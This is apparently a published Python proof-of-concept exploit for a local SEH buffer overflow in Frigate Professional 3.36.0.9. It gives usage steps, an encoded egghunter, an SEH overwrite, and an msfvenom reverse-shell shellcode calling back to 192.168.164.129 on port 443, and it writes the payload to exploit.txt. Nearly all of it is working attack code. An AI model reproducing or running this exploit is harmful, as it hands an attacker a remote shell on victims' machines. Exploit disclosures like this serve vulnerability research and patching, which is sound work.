
98 lines
No EOL
5.2 KiB
Python
Executable file
# Exploit Title: Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter)
# Date: 2020-07-24
# Exploit Author: MasterVlad
# Vendor Homepage: http://www.frigate3.com/
# Software Link: http://www.frigate3.com/download/frigate3_pro.exe
# Version: 3.36.0.9
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 32-bit

# Proof of Concept:

# 1. Run the python script
# 2. Open exploit.txt and copy the content to clipboard
# 3. Open Frigate3.exe and go to File -> Pack
# 4. Paste the clipboard into the "Archive To" field and click on Ok button

#!/usr/bin/python

egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c"
egg += "\x25\x4A\x50\x5c\x25\x4A"
egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
buf = ""
buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"

exploit = "A"*4112
# 0x40012623 - pop pop ret rtl60.bpl
exploit += "\x74\x06\x75\x04"
exploit += "\x23\x26\x01\x40"
exploit += egg
exploit += "C"*(5000-4120-len(egg))
exploit += "T00WT00W"
exploit += buf

f = open("exploit.txt", "w")
f.write(exploit)
f.close()